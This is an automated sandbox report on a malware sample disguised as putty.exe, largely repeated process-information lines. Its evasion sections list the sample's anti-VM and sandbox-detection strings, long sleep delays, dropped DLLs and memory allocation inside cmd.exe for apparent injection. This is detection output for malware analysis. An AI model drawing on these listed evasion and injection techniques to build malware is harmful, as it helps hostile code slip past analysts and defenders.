        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 709
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: threadDelayed 8061
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: threadDelayed 1448
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWindow / User API: foregroundWindowGot 420
        Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2972Thread sleep time: -44533s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1520Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2984Thread sleep time: -42305s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1244Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2300Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 152Thread sleep time: -46429s >= -30000s
        Source: C:\ProgramData\images.exe TID: 2620Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\images.exe TID: 1192Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 2440Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep count: 709 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep time: -8508000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 2248Thread sleep time: -39409s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1480Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1960Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\ProgramData\images.exeCode function: 21_3_042397E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0423983Bh
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
        Source: C:\ProgramData\images.exeCode function: 21_3_04239970 GetSystemInfo,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 44533
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 42305
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477
        Source: C:\ProgramData\images.exeThread delayed: delay time: 46429
        Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 39409
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00406045 GetProcessHeap,RtlAllocateHeap,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess token adjusted: Debug
        Source: C:\ProgramData\images.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
        Bypasses PowerShell execution policyShow sources
